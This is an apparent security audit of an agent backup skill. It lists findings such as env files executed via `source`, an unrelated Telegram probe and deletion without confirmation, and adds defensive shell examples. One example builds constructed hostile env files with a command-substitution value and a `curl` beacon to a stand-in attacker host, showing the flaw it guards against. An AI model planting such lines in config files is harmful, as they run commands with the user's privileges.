
Security audit

OpenClaw WebDAV Backup

Security checks across malware telemetry and agentic risk

Overview

This backup skill mostly matches its stated purpose, but it needs review: some diagnostic and migration paths `source` local config files, which executes them as shell code rather than reading them, and a restore-side check contacts Telegram, which has nothing to do with restoring local backups.

Install only if you are comfortable with a shell-based backup tool that can read and restore your OpenClaw workspace, extensions, and config. Because the scripts `source` .env.backup, .env.backup.secret, .env.backup.notify, and the .env file generated for migration, treat those files as executable code that must be trusted, not as passive configuration: anything written into them runs with your user's privileges. Use --encrypt-config before any WebDAV upload, run dry-runs before any restore or deletion, and share portable exports only after reviewing their contents and the host metadata recorded in the manifest.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
Findings (11)

Description-Behavior Mismatch

Severity: Low
Confidence: 80%
Finding
The generated manifest records source host metadata such as hostname, OS, OpenClaw version, and Node version without any explicit opt-in. If the archive is shared off-host, this unnecessarily exposes system inventory that can aid fingerprinting or targeted follow-on attacks.

Context-Inappropriate Capability

Severity: High
Confidence: 99%
Finding
The generated migration script uses `source "${ENV_FILE}"`, which executes the provided file as shell code rather than safely parsing key-value pairs. A malicious or tampered env file can run arbitrary commands with the privileges of the user performing migration, making this a direct code-execution vector.

Context-Inappropriate Capability

Severity: High
Confidence: 99%
Finding
The script `source`s `${ENV_FILE}` and `${SECRET_FILE}` during a health check, which executes any shell code contained in those files rather than merely validating configuration presence. If an attacker can modify either file, running the health check becomes a code-execution primitive under the user's account, which is especially risky because these files are expected to contain trusted-looking backup credentials.

Description-Behavior Mismatch

Severity: Medium
Confidence: 97%
Finding
The restore script includes destructive backup-management features (`--delete` and `--delete-old`) that are outside the expected scope of a restore utility. This increases the chance of accidental or induced data loss, especially because users invoking a restore-oriented tool may not anticipate deletion behavior in the same entrypoint.

Description-Behavior Mismatch

Severity: Medium
Confidence: 98%
Finding
A local restore utility performs an outbound connectivity probe to `https://api.telegram.org`, which is unrelated to restoring local backups. This leaks environment/network metadata to a third party and may violate isolation expectations in restricted or sensitive environments.

Context-Inappropriate Capability

Severity: Medium
Confidence: 99%
Finding
The explicit probe to `api.telegram.org` is unjustified for a local backup restore operation and creates unnecessary outbound traffic. In high-assurance or air-gapped environments, this can reveal host activity, trigger policy violations, or fail restores due to needless dependency on network behavior.

Missing User Warnings

Severity: Medium
Confidence: 93%
Finding
The script defaults to SHOW_TOKENS=1, and in full diff mode it can display configuration differences from openclaw.json to stdout. Although there is some masking logic, it is incomplete and inconsistent: secrets are only partially redacted for a few hard-coded key names and summary/full output paths behave differently, so credentials or API tokens may be exposed in terminal logs, shell history captures, CI logs, or shared support output.
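A redaction step that runs on every output path and keys off name patterns, rather than a fixed list of key names, closes the gap this finding describes: summary and full modes cannot disagree, and a key the author never listed is still masked. The block below is an added example and not the skill's own code. The diff lines it processes are constructed to look like an openclaw.json diff plus a dotenv-style line, and `redact_secrets`, `sample_diff` and `demo_redaction` are names chosen for this example.

```shell
#!/usr/bin/env bash
# Added example, not part of the audited skill: pattern-based redaction that
# is applied to every line of output, so summary and full diff modes cannot
# disagree and keys missing from a hard-coded list are still masked.

# Masks the value of any "name": "value" JSON pair or NAME=value line whose
# name looks credential-bearing. Values are never printed in the clear, which
# keeps them out of shell history, CI logs and pasted support output.
redact_secrets() {
  awk '
    BEGIN { pat = "(token|secret|pass|key|auth|credential)" }
    {
      line = $0; out = ""; rest = line
      # Walk every JSON-style pair on the line; nested objects often sit on one line.
      while (match(rest, /"[^"]*"[ \t]*:[ \t]*"[^"]*"/)) {
        pair = substr(rest, RSTART, RLENGTH)
        name = pair; sub(/"[ \t]*:.*/, "", name); gsub(/"/, "", name)
        if (tolower(name) ~ pat) sub(/:[ \t]*"[^"]*"$/, ": \"[REDACTED]\"", pair)
        out = out substr(rest, 1, RSTART - 1) pair
        rest = substr(rest, RSTART + RLENGTH)
      }
      line = out rest
      # dotenv-style NAME=value lines, with an optional diff marker in front.
      if (out == "" && match(line, /^[ \t+-]*[A-Za-z_][A-Za-z0-9_]*=/)) {
        name = substr(line, RSTART, RLENGTH)
        sub(/^[ \t+-]*/, "", name); sub(/=$/, "", name)
        if (tolower(name) ~ pat) sub(/=.*/, "=[REDACTED]", line)
      }
      print line
    }'
}

# Constructed diff output (not a real openclaw.json): two key rotations,
# a nested object with a password on one line, and a dotenv-style line.
sample_diff() {
  cat <<'EOF'
--- a/openclaw.json
+++ b/openclaw.json
   "model": "example-model",
-  "apiKey": "sk-live-OLD0000",
+  "apiKey": "sk-live-NEW1111",
   "webdav": { "url": "https://dav.example.invalid", "password": "hunter2" },
+WEBDAV_TOKEN=ghp_constructed
EOF
}

# Runs the sample through the filter; this is the function to check.
demo_redaction() { sample_diff | redact_secrets; }

demo_redaction
```

The filter over-redacts on purpose: a name such as `monkey` would be masked because it contains `key`. For a diff meant to be pasted into a ticket, hiding a harmless value is the cheaper mistake, and the unredacted diff remains available to the operator who explicitly asks for it.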

Missing User Warnings

Severity: Medium
Confidence: 86%
Finding
The export copies the full workspace and extensions into the archive without an explicit warning or confirmation to the user. In this skill context, those directories may contain prompts, agent memory, documents, plugins, or other sensitive local data, so silent packaging increases the risk of accidental disclosure when the archive is transferred or stored offsite.

Missing User Warnings

Severity: Medium
Confidence: 87%
Finding
Recording hostname and OS details in the manifest without clear user disclosure creates avoidable metadata leakage. While not code execution, this information can still reveal infrastructure details if the package is uploaded to WebDAV or shared during migration.

Missing User Warnings

Severity: Medium
Confidence: 91%
Finding
The script loads a secret-bearing file with `source` and gives no explicit warning that running a health check will execute contents from credential/config files. This increases the chance that operators will run it assuming it is read-only diagnostics, when in fact malicious or malformed content in those files can trigger command execution and potentially expose or misuse credentials.
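The three findings about `source` (the migration script, the health check, and the missing warning for it) come down to one mechanism: a dotenv-style file is shell code when sourced, so a line such as `KEY=$(cmd)` runs `cmd`. The following is an added example, not code from the OpenClaw WebDAV Backup skill. It writes a constructed hostile env file, shows what `source` does with it, and contrasts a strict loader that accepts only `NAME=value` lines and stores the value literally. The function names (`write_demo_env`, `write_bare_command_env`, `safe_load_env`, `pass_via_source`, `pass_via_parser`) and the file contents are this example's own.

```shell
#!/usr/bin/env bash
# Added example, not part of the audited skill. Contrasts `source` with a
# strict NAME=value loader for credential files such as .env.backup.

# Constructed hostile env file (not a real skill file): an honest line is
# followed by a value that is a command substitution. `source` executes it.
write_demo_env() {
  cat >"$1" <<'EOF'
# WebDAV backup target
WEBDAV_URL="https://dav.example.invalid/remote.php/dav"
WEBDAV_PASS=$(printf injected-%s marker)
EOF
}

# Constructed file with a bare command on its own line, which `source` would
# also run; the strict loader must refuse the whole file instead.
write_bare_command_env() {
  cat >"$1" <<'EOF'
WEBDAV_URL=https://dav.example.invalid/remote.php/dav
curl -s https://attacker.invalid/beacon
EOF
}

# Strict loader: exports NAME=value for each line, with the value taken
# literally (no command substitution, parameter expansion or globbing).
# Any line that is not a plain assignment, including `export NAME=v`,
# aborts the load so a tampered file cannot be partially trusted.
safe_load_env() {
  file="$1"
  lineno=0
  while IFS= read -r line || [ -n "$line" ]; do
    lineno=$((lineno + 1))
    case "$line" in
      ''|'#'*) continue ;;          # blank line or comment
    esac
    key="${line%%=*}"
    value="${line#*=}"
    if [ "$key" = "$line" ] \
       || ! printf '%s\n' "$key" | grep -Eq '^[A-Za-z_][A-Za-z0-9_]*$'; then
      printf 'refusing %s:%d: not a NAME=value assignment\n' "$file" "$lineno" >&2
      return 1
    fi
    # Strip one layer of matching quotes; the inside is still not expanded.
    case "$value" in
      \"*\") value="${value#\"}"; value="${value%\"}" ;;
      \'*\') value="${value#\'}"; value="${value%\'}" ;;
    esac
    export "$key=$value"
  done <"$file"
}

# What the audited migrate and health-check paths do: `source` the file in a
# subshell and report WEBDAV_PASS. By then the command substitution has run.
pass_via_source() { ( . "$1"; printf '%s' "$WEBDAV_PASS" ); }

# Same file through the strict loader: WEBDAV_PASS holds the literal text.
pass_via_parser() { ( safe_load_env "$1" && printf '%s' "$WEBDAV_PASS" ); }

demo() {
  f="$(mktemp)"
  write_demo_env "$f"
  printf 'via source : %s\n' "$(pass_via_source "$f")"
  printf 'via parser : %s\n' "$(pass_via_parser "$f")"
  rm -f "$f"
}
demo
```

The loader is deliberately strict about what it accepts rather than trying to sanitize: a file that contains anything other than comments and assignments is rejected outright, because a credential file that needs shell features is a credential file that can run code.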

Missing User Warnings

Severity: Medium
Confidence: 96%
Finding
Bulk deletion of old backups occurs without an interactive confirmation step, making large-scale irreversible data loss possible from a single command or mistaken parameter. Because this logic lives in a restore script, the surprise factor further increases the risk of operator error or misuse through automation.
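A maintenance path can keep a `--delete-old` feature while making its default safe: compute the set of archives outside the retention window from an allowlisted name pattern, print it, and only delete when the caller passes an explicit `--yes`. This is an added example rather than the skill's own code. The archive listing is constructed, `select_expired`, `prune_old_backups` and `delete_remote` are this example's names, and `delete_remote` stands in for whatever WebDAV DELETE call a real tool would make.

```shell
#!/usr/bin/env bash
# Added example, not the audited skill's code: retention pruning whose
# default is a dry run and whose destructive path requires an explicit --yes.

# Constructed remote listing, as a tool might have it after parsing a WebDAV
# PROPFIND response. Includes a stray file that must never be selected.
SAMPLE_LISTING='openclaw-backup-20240301T000000Z.tar.gz
openclaw-backup-20240101T000000Z.tar.gz
notes.txt
openclaw-backup-20240401T000000Z.tar.gz
openclaw-backup-20240201T000000Z.tar.gz'

# Print the archives older than the newest $1, oldest first. Only names that
# match the tool's own naming scheme are eligible, so a foreign file in the
# same directory cannot be deleted through this code path.
select_expired() {  # $1 = number to keep, $2 = listing
  printf '%s\n' "$2" \
    | grep -E '^openclaw-backup-[0-9]{8}T[0-9]{6}Z\.tar\.gz$' \
    | sort \
    | awk -v keep="$1" '{ a[NR] = $0 } END { for (i = 1; i <= NR - keep; i++) print a[i] }'
}

# Stand-in for the real WebDAV DELETE; a real tool would issue the request here.
delete_remote() { printf 'DELETE %s\n' "$1"; }

# Prunes to $1 archives. Without --yes it only reports the plan and returns 0
# with nothing deleted, so an automation job or a typo cannot destroy backups.
prune_old_backups() {  # $1 = keep, $2 = listing, $3 = --yes or --dry-run
  case "$1" in
    ''|*[!0-9]*) echo "keep count must be a non-negative integer" >&2; return 2 ;;
  esac
  expired="$(select_expired "$1" "$2")"
  if [ -z "$expired" ]; then
    echo "nothing to prune"
    return 0
  fi
  if [ "$3" != "--yes" ]; then
    printf 'DRY RUN, pass --yes to delete:\n%s\n' "$expired"
    return 0
  fi
  printf '%s\n' "$expired" | while IFS= read -r name; do
    delete_remote "$name"
  done
}

prune_old_backups 2 "$SAMPLE_LISTING" --dry-run
```

Two choices do the work here: the eligible set is derived from the tool's own naming scheme rather than from "everything in the directory", and the flag that enables deletion is the one that has to be typed, not the one that has to be remembered.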

VirusTotal

64/64 vendors flagged this skill as clean.


Static analysis

No suspicious patterns detected.